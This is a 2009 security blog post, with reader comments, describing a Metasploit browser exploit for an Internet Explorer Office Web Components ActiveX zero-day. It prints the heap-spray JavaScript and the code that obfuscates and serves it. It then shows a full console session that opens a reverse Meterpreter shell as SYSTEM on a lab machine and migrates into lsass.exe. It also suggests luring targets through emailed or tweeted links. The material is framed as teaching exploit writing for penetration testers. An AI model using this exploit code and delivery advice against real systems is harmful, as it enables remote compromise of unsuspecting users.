Navigation
« Firefox 3.5 escape() Return Value Memory Corruption Metasploit Exploit | Main | Meterpreter Stealthier than Ever »
Tuesday
Jul142009

Metasploit OWC ActiveX Exploit

HD Moore has released another IE 0 day Metasploit Exploit Module in less than 2 weeks The Office Web Component Exploit in Metasploit committed to the Dev 3.3 SVN will attack this vulnerability on:

  • Windows XP SP0 to SP3 with IE6 or IE7 with Office XP or Office 2003 Installed

The exploit will exploit in specific the spreadsheet component of the ActiveX. the code for the whole exploit can be seen in trac.metasploit.com

Here is a brief description of the main parts of the code that make this exploit. The exploit as done in Metasploit will create a encode key for the java payload:

@javascript_encode_key = rand_text_alpha(rand(10) + 10)

Then when a URI request is done against the listening exploit the Java code is encoded and presented to the target making this exploit very hard to detect by HIPS, IDS, AV and IPS alike. The main body of Javascript code is:

shellcode = Rex::Text.to_unescape(p.encoded)
retaddr   = Rex::Text.to_unescape([target.ret].pack('V'))
js = %Q|
		var xshellcode = unescape("#{shellcode}");
		var xarray = new Array();
		var xls = 0x81000-(xshellcode.length*2);
		var xbigblock = unescape("#{retaddr}");
		while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
		var xlh = xbigblock.substring(0, xls / 2);
		delete xbigblock;
		for(xi=0; xi<0x99*2; xi++) {
				xarray[xi] = xlh + xlh + xshellcode;
		}
		CollectGarbage();
		var xobj = new ActiveXObject("OWC10.Spreadsheet");
		xe = new Array();
		xe.push(1);
		xe.push(2);
		xe.push(0);
		xe.push(window);
		for(xi=0;xi<xe.length;xi++){
				for(xj=0;xj<10;xj++){
						try { xobj.Evaluate(xe[xi]); } catch(e) { }
				}
		}
		window.status = xe[3] + '';
		for(xj=0; xj<10; xj++){
				try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
		}
|

Then this payload is encoded with the key and presented to the target:

# Obfuscate it up a bit
encoded_js = obfuscate_js(js,
		'Symbols' =>
				{
						'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj}
				})
# Encode the javascript payload
# encoded_js = encrypt_js(encoded_js, @javascript_encode_key)
# Fire off the page to the client
send_response(cli, "<html><script language='javascript'>#{encoded_js}</script></html>")
# Handle the payload
handler(cli)

To use the exploit we must load the exploit at the msfconsole, for this example the console will be ran as root since we want to use port 80 for the exploit handler to listen to, this will help by using the default port 80 port for when doing directed attacks and there might be some filtering on the target network, we set the exploit and payload:

carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole
[sudo] password for carlos:
                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|
       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux
msf > use exploit/windows/browser/owc_spreadsheet_msdso
msf exploit(owc_spreadsheet_msdso) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(owc_spreadsheet_msdso) > set LHOST 192.168.1.158
LHOST => 192.168.1.158

Know we take a look at the other options we have available for this module and we change the port to listen on to 80:

msf exploit(owc_spreadsheet_msdso) > show options
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH                   no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.1.158    yes       The local address
   LPORT     4444             yes       The local port
Exploit target:
   Id  Name
   --  ----
   0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
msf exploit(owc_spreadsheet_msdso) > set SRVPORT 80
SRVPORT => 80

We know launch the exploit and make sure no errors are reported:

msf exploit(owc_spreadsheet_msdso) > exploit
[*] Exploit running as background job.
msf exploit(owc_spreadsheet_msdso) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/4fwmCRO
[*]  Local IP: http://192.168.1.158:80/4fwmCRO
[*] Server started.

We can now send and email, tweet with URL shortened or any other method od delivery of the address to the target. Once the exploit is ran we must quickly migrate off the process since IE will hang and a user might kill the process destroying our shell:

[*] Sending Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption to 192.168.1.139:1067...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.139:1068)
msf exploit(owc_spreadsheet_msdso) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run migrate
[*] Migrating to lsass.exe...
[*] Current server process: iexplore.exe (1328)
[*] New server process: lsass.exe (684)
meterpreter >
meterpreter > sysinfo
Computer: WINXPLAB01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

 

This exploit should be done after the enumeration of the target network, preferably using metadata on documents using tools like FOCA or Metagoofil to detect the Office and OS to create the files and with this information target the attack.

UPDATE: HD Made some changes to the code removing the obfuscation since there appears to be some problems with encrypt_js and this specific exploit, either way I believe that the code description is useful for anyone looking at learning how to write exploit in Metasploit.

Reader Comments (3)

Hello!!

I have a problem with meterpreter... can you help me?

The problem is that i install the meterpreter service on a WinXP, i config the firewall port etc etc.. but i can't connect to meterpreter because i don't know i need!! I need to use handler exploit??? I think not is the solution...

Sorry for my bad english, and congratulations for your blog!!! Haven't RSS???

THANKS!

July 16, 2009 | Unregistered Commenterfrank

use multi/handler
set payload windows/metsvc_bind_tcp
set LPORT <port you set it up with>
exploit

July 16, 2009 | Registered CommenterCarlos Perez

Thanks!!!
But not works!! :S

I set RHOST to ip of WinXP (VMware)
I set LPORT to 31337.... LPORT or RPORT, I tried the two options (the port of service is 31337)
I use windows/metsvc_bind_tcp
Exploit and time out!!! And the service it's install fine and firewall of windows disabled and hasn't antivirus... any idea?

Thanks carlos!

July 17, 2009 | Unregistered Commenterfrank

PostPost a New Comment

Enter your information below to add a new comment.
Author Email (optional):
Author URL (optional):
Post:
 
All HTML will be escaped. Hyperlinks will be created for URLs automatically.